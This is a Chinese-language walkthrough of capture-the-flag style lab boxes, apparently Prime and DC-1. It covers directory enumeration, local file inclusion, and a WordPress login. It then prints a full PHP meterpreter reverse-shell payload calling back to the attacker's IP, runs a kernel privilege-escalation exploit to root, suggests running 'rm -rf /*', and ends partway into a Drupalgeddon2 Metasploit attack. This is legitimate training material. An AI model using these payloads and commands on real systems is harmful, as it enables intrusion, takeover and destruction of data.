---- Entering directory: http://192.168.110.139/wordpress/ ----
+ http://192.168.110.139/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.110.139/wordpress/wp-admin/
==> DIRECTORY: http://192.168.110.139/wordpress/wp-content/
==> DIRECTORY: http://192.168.110.139/wordpress/wp-includes/
+ http://192.168.110.139/wordpress/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.110.139/javascript/jquery/ ----
+ http://192.168.110.139/javascript/jquery/jquery (CODE:200|SIZE:284394)

---- Entering directory: http://192.168.110.139/wordpress/wp-admin/ ----
+ http://192.168.110.139/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.110.139/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.110.139/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.110.139/wordpress/wp-admin/includes/
+ http://192.168.110.139/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.110.139/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.110.139/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.110.139/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.110.139/wordpress/wp-admin/user/

---- Entering directory: http://192.168.110.139/wordpress/wp-content/ ----
+ http://192.168.110.139/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.110.139/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.110.139/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.110.139/wordpress/wp-content/uploads/

---- Entering directory: http://192.168.110.139/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.110.139/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.110.139/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.110.139/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.110.139/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.110.139/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.110.139/wordpress/wp-admin/network/ ----
+ http://192.168.110.139/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.110.139/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.110.139/wordpress/wp-admin/user/ ----
+ http://192.168.110.139/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.110.139/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.110.139/wordpress/wp-content/plugins/ ----
+ http://192.168.110.139/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.110.139/wordpress/wp-content/themes/ ----
+ http://192.168.110.139/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.110.139/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat Jul 30 22:25:56 2022
DOWNLOADED: 46120 - FOUND: 15

1
2
3
4
5
# 挑选出能访问到页面的
http://192.168.110.139/dev
http://192.168.110.139/index.php
http://192.168.110.139/wordpress
http://192.168.110.139/wordpress/wp-admin/admin.php

image-20220731103121100

image-20220731103211493

image-20220731103317254

image-20220731103422292

这几个网址目录显示的信息有限,我们采用下一步的精细扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
找到.txt .php .zip后缀的网址
# dirb http://192.168.110.139 -X .txt,.php,.zip

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Jul 30 22:42:37 2022
URL_BASE: http://192.168.110.139/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt,.php,.zip) | (.txt)(.php)(.zip) [NUM = 3]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.110.139/ ----
+ http://192.168.110.139/image.php (CODE:200|SIZE:147)
+ http://192.168.110.139/index.php (CODE:200|SIZE:136)
+ http://192.168.110.139/secret.txt (CODE:200|SIZE:412)

-----------------
END_TIME: Sat Jul 30 22:42:51 2022
DOWNLOADED: 13836 - FOUND: 3

1
2
http://192.168.110.139/secret.txt
http://192.168.110.139/image.php

image-20220731104652311

wfuzz 模糊测试:

1.目录扫描

2.找参数 192.168.110.139/?=value 它能替换找到对应参数

3.密码爆破 username password

4.找sql xss

5.压力测试

这个网址是留给我们的提示,我们可以使用wfuzz来找到网页的参数

image-20220731104708267

http://192.168.110.139/index.php?FUZZ 爆破出来的参数要替换FUZZ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
爆破出参数太多了需要进行过滤
# wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt -u http://192.168.110.139/index.php?FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.110.139/index.php?FUZZ
Total requests: 951

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000003: 200 7 L 12 W 136 Ch "01"
000000027: 200 7 L 12 W 136 Ch "access"
000000026: 200 7 L 12 W 136 Ch "academic"
000000028: 200 7 L 12 W 136 Ch "accessgranted"
000000015: 200 7 L 12 W 136 Ch "2001"
000000001: 200 7 L 12 W 136 Ch "@"
000000025: 200 7 L 12 W 136 Ch "about"




─# wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt -u http://192.168.110.139/index.php?FUZZ --hw 12
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.110.139/index.php?FUZZ
Total requests: 951

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000341: 200 7 L 19 W 206 Ch "file"

Total time: 0
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 0

http://192.168.110.139/index.php?file=

这有可能是个文件包含漏洞

http://192.168.110.139/secret.txt 里面给的提示//see the location.txt and you will get your next move//

那我们可以写成http://192.168.110.139/index.php?file=location.txt

image-20220731112000870

用secrettier360替换file作为参数

http://192.168.110.139/index.php?secrettier360=?

我们尝试看一下/etc/passwd

http://192.168.110.139/index.php?secrettier360=/etc/passwd

额!!!访问不了。。。我又看了一下,哦漏了个other php,我们遇到的第二个php是image.php

那么修改网址为http://192.168.110.139/image.php?secrettier360=/etc/passwd

image-20220731112512692

nice!!!仔细观察发现一句很特殊的话find password.txt file in my directory:/home/saket

那么,我们重新修改url

http://192.168.110.139/image.php?secrettier360=/home/saket/password.txt

image-20220731112713007

那么我们在前面,找到了wordpress的登录界面和用户

image-20220801202127526

加上这个密码follow_the_ippsec

image-20220801202152244

nice。。。进去了之后我们找个地方写反弹shell,经过一系列乱七八糟的翻找。。。我发现这里可以写入php…那么写入一句话木马好呢,还是写入反弹shell呢!!!这里我用反弹shell。。。

image-20220801202629422

首先我们来到kali生成一个反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
# lhost是kali的ip,lport是kali的监听端口
# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.110.135 lport=7777 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1116 bytes
Saved as: shell.php

┌──(root㉿kali)-[~]
└─# cat shell.php
/*<?php /**/ error_reporting(0); $ip = '192.168.110.135'; $port = 7777; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

# 注意:复制这个反弹shell里面的内容记得不要复制前面的/*

image-20220801204828269

然后左下角保存

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# 我们建立kali的监听
──(root㉿kali)-[~]
└─# msfconsole

# msf6 > use exploit/multi/handler

# msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

# msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


# msf6 exploit(multi/handler) > set lhost 192.168.110.135
lhost => 192.168.110.135
# msf6 exploit(multi/handler) > set lport 7777
lport => 7777
#msf6 exploit(multi/handler) > exploit

我们无法得知这个脚本的路径怎么办呢?很简单。。。百度那个目标文件的路径或者直接下载一个wordpress看文件不就得了

好了路径是http://192.168.110.139/wordpress/wp-content/themes/twentynineteen/secret.php

在浏览器上输入url之后回车,kali就能监听到反弹回来的信息,并且控制www

image-20220801204258071

image-20220801205250240

image-20220801205310719

我们用输入shell来对进入靶机的命令窗口环境

image-20220801205615446

我们可以通过whoami知道现在的用户是web的用户,我们的权限太低了,得想办法提权,我们在前面知道这个ubuntu的系统非常老了,版本在16.04

image-20220801205826938

我们通过kali查一下这个系统的漏洞

在msfconsole里面输入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
msf6 > searchsploit 16.04 ubuntu
[*] exec: searchsploit 16.04 ubuntu

------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------- ---------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution | linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'tote | linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation | linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611 | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stac | linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read | linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit) | linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak | linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Esc | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation | linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer | linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalatio | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege | linux/local/47169.c
------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
# 这么多个漏洞,我们发现倒数第5个漏洞Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation有本地提权的能力,我
们来到kali的炸弹库拷贝武器,然后编译一下。。。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
──(root㉿kali)-[~]
└─# cd /usr/share/exploitdb/exploits/linux/local

┌──(root㉿kali)-[/usr/…/exploitdb/exploits/linux/local]
└─# ls
10018.sh 19073.txt 19925.c 21061.c 22340.txt 23882.pas 31959.txt 37710.txt 41173.c 45132.rb 50385.txt
10038.txt 19074.txt 19933.rb 21062.txt 22344.txt 23892.c 319.c 37898.py 41196.txt 45147.rb 50465.c
10060.sh 19077.c 19946.txt 21063.txt 22362.c 24027.txt 31.pl 37937.c 411.c 45175.c 50541.c
1009.c 19078.c 19952.c 21124.txt 22363.c 24043.c 320.pl 37975.py 41240.sh 45184.sh 50689.txt
1029.c 19080.txt 19953.c 21158.c 22376.txt 2404.c 3213.c 37987.py 41356.txt 45205.txt 50808.c
10313.c 19095.txt 19954.c 21159.c 22452.sh 24123.sh 322.c 37988.py 41435.txt 45243.txt 50858.txt
10396.pl 19106.c 19955.c 21216.sh 22456.txt 24141.txt 32446.txt 38232.txt 41458.c 45288.py 5092.c
10487.txt 19122.txt 19969.c 21217.sh 22458.c 24182.c 325.c 38298.txt 41597.txt 45313.rb 5093.c
104.c 19125.txt 19970.c 21218.sh 22531.pl 24278.sh 32700.rb 38353.txt 4172.c 45369.rb 5167.sh
10613.c 19142.sh 19979.pl 21219.sh 22538.pl 24398.sh 32805.c 38357.c 41760.txt 45372.txt 5424.txt
106.c 19146.sh 19980.pl 21226.c 22540.c 24406.txt 32820.txt 38390.c 41761.txt 45407.txt 586.c
1154.pl 19240.c 19981.sh 21227.sh 22565.c 24421.c 32829.c 38473.py 41762.txt 45497.txt 587.c
1170.c 19243.txt 19991.c 21229.txt 22567.c 24458.txt 32848.txt 38559.txt 41763.txt 45528.txt 591.c
1181.c 19249.c 19992.c 21231.c 22594.c 24459.sh 32947.txt 38775.rb 41764.txt 45548.txt 600.c
1187.c 19254.c 20000.c 21247.c 22616.pl 24570.txt 33028.txt 38817.txt 41765.txt 45553.c 601.c
120.c 19255.txt 20001.sh 21248.txt 22617.c 24606.c 33145.c 38832.py 41766.txt 45573.txt 6032.py
12130.py 19256.c 20004.c 21258.bat 22633.c 2466.pl 331.c 38937.txt 41770.txt 45575.rb 624.c
1215.c 19257.c 20013.c 21259.java 22640.c 24694.c 33255.txt 39010.c 41786.rb 45631.md 6337.sh
1229.sh 19259.c 20021.txt 21280.c 22643.pl 24749.sh 3330.pl 39112.txt 417.c 45715.txt 657.c
1267.c 19270.c 20024.c 21281.c 22644.c 24750.c 33321.c 39134.txt 41875.py 45798.txt 669.c
1297.py 19279.sh 20045.c 21302.c 22645.c 24757.java 33322.c 39166.c 41886.c 45804.txt 684.c
1299.sh 19281.c 2004.c 21323.c 22683.pl 24758.java 33336.c 39207.txt 41907.c 45832.py 6851.c
129.asm 19283.c 2005.c 21341.c 22695.pl 24929.rb 3333.pl 39214.c 41923.txt 45846.py 695.c
12.c 19284.c 2006.c 21342.c 22703.c 2492.s 33387.txt 39217.c 41955.rb 45865.php 7177.c
1300.sh 19285.txt 20093.c 21348.txt 22719.pl 24933.txt 33395.txt 39230.c 41973.txt 45886.txt 718.c
1310.txt 19286.c 2011.sh 21353.c 22720.c 249.c 33508.txt 39244.txt 41994.c 45913.rb 71.c
1316.pl 19302.c 2013.c 21356.sh 22729.c 25106.c 33523.c 39277.c 41995.c 45915.rb 72.c
131.c 19305.c 20141.pl 21362.c 22745.c 25134.c 3356.sh 39285.py 41999.txt 46006.c 7313.sh
1397.c 19311.c 20142.sh 21375.txt 22748.c 25202.c 33576.txt 393.c 42045.c 46044.md 7393.txt
140.c 19312.c 20155.txt 21398.txt 22768.pl 25288.c 33604.sh 39433.py 42053.c 46186.rb 741.pl
1412.rb 19314.c 2015.py 21420.c 22773.c 25289.c 33614.c 394.c 42076.py 46241.rb 744.c
1415.c 19315.c 20160.txt 2144.sh 22775.txt 252.pl 33623.txt 39535.sh 42183.c 46341.rb 756.c
141.c 19360.c 2016.sh 21458.txt 22781.txt 25406.sh 33808.c 39549.txt 42255.py 46359.md 75.sh
1425.c 19370.c 20185.c 21496.c 22806.sh 25411.py 33824.c 39628.txt 42265.py 46361.py 7618.c
14273.sh 19371.c 20201.c 21497.pl 22813.c 25444.c 3384.c 39673.py 42305.txt 46362.py 763.c
142.c 19373.c 20250.c 21499.txt 22815.c 25450.c 33899.txt 39692.py 42356.txt 46369.md 7681.txt
14339.sh 19374.c 20251.c 21500.txt 22836.pl 255.pl 33904.txt 39702.rb 42357.py 46676.php 776.c
1445.c 19384.c 20252.c 21501.txt 22840.c 25688.txt 33963.txt 39734.py 42424.py 466.pl 778.c
1449.c 193.sh 20285.c 21502.txt 22847.txt 25707.txt 339.c 39764.py 42611.txt 46730.rb 779.sh
144.c 19419.c 20291.sh 21503.sh 22860.c 25709.sh 34001.c 39769.txt 42626.c 46807.txt 7855.txt
145.c 19422.txt 20312.c 21504.sh 22861.c 25789.c 34267.sh 39771.txt 42887.c 46973.md 7856.txt
14814.c 19428.c 20316.txt 21505.c 22862.c 257.pl 3426.php 39772.txt 42936.md 46978.sh 788.pl
14830.py 19429.sh 2031.c 21506.c 22863.c 2581.c 3427.php 39810.py 42937.md 46989.sh 791.c
15074.sh 19464.c 20338.c 21507.sh 22884.c 258.sh 3440.php 39811.txt 43006.txt 4698.c 792.c
15150.c 19465.c 20339.sh 21538.c 22928.pl 25947.txt 34421.c 39938.rb 43007.txt 46996.sh 796.sh
15155.c 19467.c 20341.sh 21568.c 22943.c 25993.sh 34537.txt 39967.txt 43029.c 469.sh 816.c
1518.c 19469.c 20378.pl 21583.pl 22965.c 260.c 3479.php 39992.md 43127.c 47009.c 824.c
15274.txt 19470.c 20385.sh 21584.pl 22971.txt 26100.sh 3480.php 3.c 43331.txt 47017.rb 8303.c
15285.c 19474.txt 203.sh 21585.c 22979.txt 26195.txt 34923.c 40003.c 43345.c 47072.rb 8369.sh
152.c 19485.c 20402.sh 215.c 22984.c 26218.txt 34987.c 40023.py 43359.c 470.c 8470.py
15304.txt 19499.c 20411.c 21623.txt 22985.c 26321.c 3499.php 40025.py 43418.c 47133.txt 8478.sh
15344.c 19500.c 20458.txt 21624.py 22993.txt 26353.txt 35021.rb 40054.c 43449.rb 47147.txt 8534.c
15481.c 19501.c 20493.sh 21666.txt 22996.c 26451.rb 35112.sh 40169.txt 434.sh 47149.txt 8572.c
154.c 19508.sh 20517.c 21667.c 229.c 26492.txt 35161.c 40203.py 43775.c 47163.c 8673.c
15620.sh 19510.pl 20554.sh 21674.c 23045.pl 26498.txt 35234.py 40270.txt 438.sh 47164.sh 8678.c
15704.c 19511.c 20555.sh 21683.c 23077.pl 27056.pl 3525.php 4028.txt 43935.txt 47165.sh 876.c
15745.txt 19512.sh 20556.c 216.c 23119.c 27057.py 3529.php 40360.py 43971.rb 47166.sh 877.pl
15774.c 19517.pl 20581.c 21700.c 23126.c 27065.txt 35370.c 40392.py 43979.py 47167.sh 890.pl
1579.pl 19523.txt 205.pl 21701.pl 23168.pl 27066.txt 35450.txt 40394.rb 44023.rb 47168.c 895.c
1591.py 19544.c 20604.sh 21732.txt 23189.c 27231.txt 35595.txt 40450.txt 44024.rb 47169.c 9135.sh
15944.c 19565.sh 20626.c 21733.sh 23197.c 27297.c 35681.txt 40465.txt 44025.rb 47231.py 913.pl
1596.txt 19602.c 20645.c 21761.c 231.sh 273.c 3571.php 40488.txt 44049.md 47307.rb 914.c
16086.txt 19655.txt 20691.txt 21762.c 23204.c 27461.c 3572.php 40489.txt 44064.md 47344.rb 9191.txt
160.c 19676.c 206.c 21763.txt 23223.c 27766.txt 35746.sh 40503.rb 44097.rb 47345.rb 91.c
17083.pl 19677.c 20720.c 21793.txt 23228.c 27769.txt 35748.txt 405.c 44204.md 47421.rb 9207.sh
17147.txt 19693.txt 20721.c 217.c 23251.txt 27938.rb 35749.txt 40611.c 44205.md 47466.c 9208.txt
17391.c 19698.txt 20776.c 21814.c 23258.c 28287.c 3587.c 40616.c 44246.txt 47482.rb 924.c
17611.pl 19699.txt 20777.c 21848.rb 23297.c 28288.c 3595.c 40634.py 44279.py 47502.py 926.c
17787.c 19700.c 20778.sh 21865.c 23299.c 28332.rb 36229.py 40678.c 44298.c 47507.py 9302.py
178.c 19709.sh 20781.txt 21871.c 23300.c 28405.txt 36257.txt 40679.sh 44303.c 47543.rb 9352.c
17932.c 19710.c 20795.sh 21872.c 23301.c 285.c 36294.c 40688.rb 44325.c 4756.c 9363.c
17942.c 19723.txt 20798.sh 218.c 23303.c 28657.c 36430.sh 40759.rb 44331.py 47580.rb 93.c
18040.c 19727.c 20822.sh 2193.php 23308.c 28680.txt 36564.txt 40768.sh 44426.py 47687.py 9435.txt
18064.sh 19735.txt 20823.sh 21980.c 23344.txt 28806.txt 36571.sh 40774.sh 44452.py 476.c 9436.txt
18071.sh 19762.c 20843.txt 219.c 23345.txt 290.tcsh 36746.c 40788.txt 44523.rb 47703.txt 9479.c
18072.sh 19763.txt 20867.txt 21.c 23346.txt 29446.c 36747.c 40789.txt 44601.txt 47726.sh 950.c
18080.c 19764.txt 20868.txt 22002.txt 23350.c 29467.c 36782.sh 40810.c 44633.rb 47779.txt 9513.c
18086.c 19765.txt 20897.sh 22014.c 23351.c 29714.txt 36820.txt 40812.c 44652.py 47804.rb 9521.c
180.c 19778.c 20898.sh 22055.txt 23352.c 29746.txt 36855.py 40838.c 44654.rb 47957.rb 9543.c
18105.sh 19779.c 20900.txt 22066.c 23364.sh 29822.c 36887.py 40839.c 44677.rb 47999.txt 9545.c
18147.c 19787.txt 20901.c 22128.c 2338.c 29954.txt 36966.txt 40847.cpp 44688.txt 479.c 9574.txt
18228.sh 19794.txt 20926.txt 22189.txt 23414.txt 30093.txt 369.pl 40921.sh 44696.rb 48000.sh 9575.c
182.sh 19802.c 20927.c 22190.txt 23479.sh 30280.txt 37088.c 40936.html 44797.txt 48052.sh 9595.c
1831.txt 19803.txt 20928.sh 221.c 23481.c 30464.c 37089.txt 40937.txt 44798.txt 48131.rb 9598.txt
183.c 19804.pl 20967.c 22212.txt 23482.c 30503.txt 37167.c 40938.py 44806.txt 48185.rb 9608.c
18411.c 19811.c 20979.c 22233.c 23510.c 30604.c 37168.txt 40943.txt 44842.txt 48803.py 9627.txt
184.pl 19812.c 20986.c 22234.c 23581.pl 30605.c 37183.c 40953.sh 44889.rb 48961.py 9641.txt
186.pl 19813.txt 20988.c 22235.pl 23634.c 30620.txt 37265.txt 40962.txt 44899.txt 48962.py 9709.txt
18733.py 19816.txt 20990.c 22265.pl 23658.c 30780.txt 37292.c 40.pl 44904.py 48963.txt 973.c
18783.txt 19837.c 20992.c 222.c 23674.txt 30839.c 37293.txt 41022.md 44920.txt 49259.c 974.pl
18785.txt 19838.c 209.c 22320.c 23682.c 31151.c 3730.txt 41076.py 45009.txt 49572.txt 9844.py
18917.txt 19867.txt 21010.sh 22321.c 23738.c 31346.c 374.c 41152.txt 45010.c 49765.txt 997.sh
19070.txt 19883.c 21014.c 22322.c 23743.txt 3154.c 37543.c 41154.sh 45058.rb 50011.sh
19071.txt 19900.c 21043.c 22323.c 23759.pl 317.txt 375.c 41158.md 45089.py 50135.c
19072.txt 19915.txt 21060.c 22326.c 23849.txt 31911.txt 37631.c 41171.txt 45130.py 50236.py
# md,看到一堆漏洞执行脚本。。。吓死老子了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
──(root㉿kali)-[/usr/…/exploitdb/exploits/linux/local]
└─# cp 45010.c /root

┌──(root㉿kali)-[/usr/…/exploitdb/exploits/linux/local]
└─# cd ~

┌──(root㉿kali)-[~]
└─# ls
45010.c

# 编译完成之后可以上传靶机,执行就能获取靶机的最高权限
┌──(root㉿kali)-[~]
└─# gcc 45010.c -o 45010

我们把45010提权脚本上传到/tmp/目录下

/tmp目录是任何用户都有读写权限的,这样上传就不会有出错

image-20220801210945414

我们再次进入shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
meterpreter > shell
Process 73349 created.
Channel 2 created.
cd /tmp
ls -al
total 80
drwxrwxrwt 13 root root 4096 Aug 1 06:12 .
drwxr-xr-x 24 root root 4096 Aug 1 04:51 ..
drwxrwxrwt 2 root root 4096 Aug 1 05:58 .ICE-unix
drwxrwxrwt 2 root root 4096 Aug 1 03:42 .Test-unix
-r--r--r-- 1 root root 11 Aug 1 05:58 .X0-lock
drwxrwxrwt 2 root root 4096 Aug 1 05:58 .X11-unix
drwxrwxrwt 2 root root 4096 Aug 1 03:42 .XIM-unix
drwxrwxrwt 2 root root 4096 Aug 1 03:42 .font-unix
-rw-r--r-- 1 www-data www-data 21784 Aug 1 06:09 45010
drwxrwxrwt 2 root root 4096 Aug 1 03:42 VMwareDnD
drwx------ 3 root root 4096 Aug 1 03:42 systemd-private-2066467e9de14ff390b770637de1e2d3-colord.service-h9nmfx
drwx------ 3 root root 4096 Aug 1 05:13 systemd-private-2066467e9de14ff390b770637de1e2d3-fwupd.service-XmNTS9
drwx------ 3 root root 4096 Aug 1 03:42 systemd-private-2066467e9de14ff390b770637de1e2d3-rtkit-daemon.service-Y4buax
drwx------ 3 root root 4096 Aug 1 04:36 systemd-private-2066467e9de14ff390b770637de1e2d3-systemd-timesyncd.service-MbYS6D
drwx------ 2 root root 4096 Aug 1 03:42 vmware-root
chmod +x 45010
# 接下来我们见证奇迹
whoami
www-data
./45010
whoami
root
# 我们获取了最高权限

image-20220801211358000

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# 渗透结束
cd /root
ls
enc
enc.cpp
enc.txt
key.txt
root.txt
sql.py
t.sh
wfuzz
wordpress.sql
cat root.txt
b2b17036da1de94cfb024540a8e7075a
cat key.txt
I know you are the fan of ippsec.

So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.

我们可以修改root密码

image-20220801211851634

也可以清清垃圾

1
rm -rf /*

image-20220801211940704

image-20220801212036945

DC-1

开启DC1,我们先用kali进行一次arp的内网扫描

1
arp-scan 192.168.10.0/24 

发现一个可疑ip

image-20220829092126041

我们进行更加精确的二次扫描,这次我们使用nmap来探测其开放的端口和服务

1
nmap -T4 -O 192.168.10.130

image-20220829092339661

我们可以看到目标靶机开放了80端口的web服务,那么我们在浏览器看看这是什么网站

image-20220829092650334

额。。。出现一个很陌生端web端,我们扫描一下这个网站的目录,这需要用dirb

1
dirb http://192.168.10.130/

没什么有用的信息,我们直接查查Drupal这个是什么东西

image-20220829093758910

这是一个开源端cms网站架构,我们去msfconsole查一下它漏洞

1
msfconsole

image-20220829093927409

使用search drupal命令查询cms的漏洞模块

1
search drupal

image-20220829094445162

我们使用exploit/unix/webapp/drupal_drupalgeddon2漏洞模块

1
use exploit/unix/webapp/drupal_drupalgeddon2

image-20220829095305754

然后设置载荷为payload php/meterpreter/reverse_tcp

1
set payload php/meterpreter/reverse_tcp

然后设定靶机IP为192.168.10.130,kali端ip为192.168.10.129

1
2
set rhosts 192.168.10.130
